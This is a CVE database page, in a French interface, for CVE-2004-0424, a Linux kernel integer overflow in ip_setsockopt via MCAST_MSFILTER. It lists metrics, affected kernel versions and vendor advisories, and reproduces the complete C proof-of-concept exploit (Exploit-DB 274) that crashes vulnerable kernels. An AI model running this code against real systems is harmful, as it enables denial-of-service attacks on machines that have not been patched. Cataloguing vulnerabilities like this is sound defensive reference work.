English
Français
Light
Dark
System

CVEFind - Alertes CVE

Restez informé en continue
Créer un compte Ouvrez un compte Simple et Gratuit Se connecter Gérez vos alertes

CVE-2004-0424 : Détail

CVE-2004-0424

0.04%V3
Local
2004-04-30 02:00 +00:00
2017-10-09 22:57 +00:00
CVE.org
NVD

Alerte pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.
Gestion des alertes

Descriptions

Integer overflow in the ip_setsockopt function in Linux kernel 2.4.22 through 2.4.25 and 2.6.1 through 2.6.3 allows local users to cause a denial of service (crash) or execute arbitrary code via the MCAST_MSFILTER socket option.

Informations

Metrics

Metric Score Sévérité CVSS Vecteur Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

EPSS Score

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

EPSS Percentile

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 274

Date de publication : 2004-04-20 22:00 +00:00
Auteur : Julien Tinnes
EDB Vérifié : Yes

/* setsockopt proof of concept code by Julien TINNES (julien a.t cr0.org) vulnerability found (as always by Paul Starzetz This is only a lame POC which will crash the machine, no root shell here. Maybe later, when everybody will have an updated box. It should work on 2.6.1, 2.6.2 and 2.6.3 kernels. Greets to Christophe Devine, too bad you wasn't with me for this one. */ #include <errno.h> void perror (const char *s); #include <sys/types.h> #include <sys/socket.h> #include <linux/in.h> #include <linux/socket.h> #define SOL_IP 0 #define MCAST_MSFILTER 48 /* mynumsrc and alloc_room control the overflow * what we write can be controlled too (not needed * here but needed for rootshell exploit */ #define mynumsrc 0x100 /* 0x100 should be enough, can be tweaked */ #define alloc_room 1 /* let it alocate only one u32 */ struct mygroup_filter { __u32 gf_interface; /* interface index */ struct sockaddr_storage gf_group; /* multicast address */ __u32 gf_fmode; /* filter mode */ __u32 gf_numsrc; /* number of sources */ struct sockaddr_storage gf_slist[mynumsrc]; /* interface index */ }; void main (void) { int mysocket; int sockprot; struct mygroup_filter mygroup; int optlen; int i; struct sockaddr_in *psin; mygroup.gf_interface = 0; mygroup.gf_numsrc = (1 << 30) - 4 + alloc_room; mygroup.gf_group.ss_family = AF_INET; for (i = 0; i < mynumsrc; i++) { psin = (struct sockaddr_in *) &mygroup.gf_slist[i]; psin->sin_family = AF_INET; } mysocket = socket (PF_INET, SOCK_STREAM, 0); if (mysocket == -1) { perror ("Socket creation error: "); exit (1); } optlen = sizeof (struct mygroup_filter); printf ("Calling setsockopt(), this should crash the box...\n"); sockprot = setsockopt (mysocket, SOL_IP, MCAST_MSFILTER, &mygroup, optlen); if (sockprot == -1) { perror ("Invalid setsockopt: "); exit (1); } } // milw0rm.com [2004-04-21]

Products Mentioned

Configuraton 0

Sgi>>Propack >> Version 3.0

Configuraton 0

Linux>>Linux_kernel >> Version 2.4.22

Linux>>Linux_kernel >> Version 2.4.23

Linux>>Linux_kernel >> Version 2.4.23

Linux>>Linux_kernel >> Version 2.4.23_ow2

    Linux>>Linux_kernel >> Version 2.4.24

    Linux>>Linux_kernel >> Version 2.4.24_ow1

      Linux>>Linux_kernel >> Version 2.4.25

      Linux>>Linux_kernel >> Version 2.6.1

      Linux>>Linux_kernel >> Version 2.6.1

      Linux>>Linux_kernel >> Version 2.6.1

      Linux>>Linux_kernel >> Version 2.6.2

      Linux>>Linux_kernel >> Version 2.6.3

      Slackware>>Slackware_linux >> Version 9.1

      Slackware>>Slackware_linux >> Version current

      References

      http://www.redhat.com/support/errata/RHSA-2004-183.html
      Tags : vendor-advisory, x_refsource_REDHAT
      http://www.mandriva.com/security/advisories?name=MDKSA-2004:037
      Tags : vendor-advisory, x_refsource_MANDRAKE
      http://www.securityfocus.com/bid/10179
      Tags : vdb-entry, x_refsource_BID
      http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000852
      Tags : vendor-advisory, x_refsource_CONECTIVA
      http://marc.info/?l=bugtraq&m=108253171301153&w=2
      Tags : mailing-list, x_refsource_BUGTRAQ

      Plus d'informations
      Cliquez sur le bouton à gauche (OFF), pour autoriser l'inscription de cookie améliorant les fonctionnalités du site. Cliquez sur le bouton à gauche (Tout accepter), pour ne plus autoriser l'inscription de cookie améliorant les fonctionnalités du site.